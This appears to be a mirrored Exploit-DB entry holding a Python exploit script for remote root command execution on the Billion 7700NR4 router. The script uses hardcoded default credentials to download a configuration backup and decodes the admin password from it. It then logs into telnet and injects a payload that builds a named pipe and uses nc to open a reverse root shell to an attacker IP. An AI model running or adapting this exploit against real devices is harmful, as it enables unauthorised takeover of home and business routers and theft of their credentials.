Billion 7700NR4 Router – Remote Command Execution

• Exploit Database
• 109 阅读

• 作者： R-73eN
  日期： 2016-10-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40472/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  # Title : Billion Router 7700NR4 Remote Root Command Execution # Date : 06/10/2016 # Author : R-73eN # Tested on: Billion Router 7700NR4 # Vendor : http://www.billion.com/ # Vulnerability Description: # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these # credentials we don&apos;t have to much access but the lack of authentication security we can download the backup and get the admin password. # Using that password we can login to telnet server and use a shell escape to get a reverse root connection. # You must change host with the target and reverse_ip with your attacking ip. # Fix: # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. #   import requests import base64 import socket import time   host = "" def_user = "user" def_pass = "user" reverse_ip = "" #Banner banner = "" banner +="_________ __\n" banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n" banner +="| || &apos;_ \| |_ / _ \| |_ / _ \ &apos;_ \/ _ \ | |\n" banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n" banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner     # limited shell escape evil = &apos;ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc &apos; + reverse_ip+ &apos; 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &&apos;   def execute_payload(password): print "[+] Please run nc -lvp 1337 and then press any key [+]" raw_input() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,23)) s.recv(1024) s.send("admin\r") a= s.recv(1024) time.sleep(1) s.send(password +"\r") time.sleep(1) s.recv(1024) s.send(evil + "\r") time.sleep(1) print "[+] If everything worked you should get a reverse shell [+]" print "[+] Warning pressing any key will close the SHELL [+]" raw_input()         r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass)) if(r.status_code == 200): print "[+] Seems the exploit worked [+]" print "[+] Dumping data . . . [+]" temp = r.text admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0] # print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]" execute_payload(str(base64.b64decode(admin_pass))) else: print "[-] Exploit Failed [-]" print "\n[+] https://www.infogen.al/ [+]\n\n"